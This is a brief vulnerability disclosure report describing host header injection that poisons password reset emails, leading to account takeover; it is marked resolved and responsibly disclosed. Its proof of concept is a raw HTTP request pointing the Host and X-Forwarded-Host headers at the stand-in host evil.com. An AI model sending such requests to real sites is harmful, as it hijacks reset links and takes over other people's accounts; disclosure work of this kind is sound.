Host Header Private Program 2025-01-01
Host Header Injection Leading to Password Reset Poisoning
Severity: High | Status: Resolved
Summary
Manipulating the Host header in password reset requests caused reset emails to contain attacker-controlled links.
Proof of Concept
POST /forgot-password HTTP/1.1
Host: evil.com
X-Forwarded-Host: evil.com
email=victim@target.comImpact
Password reset link hijacking leading to account takeover.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.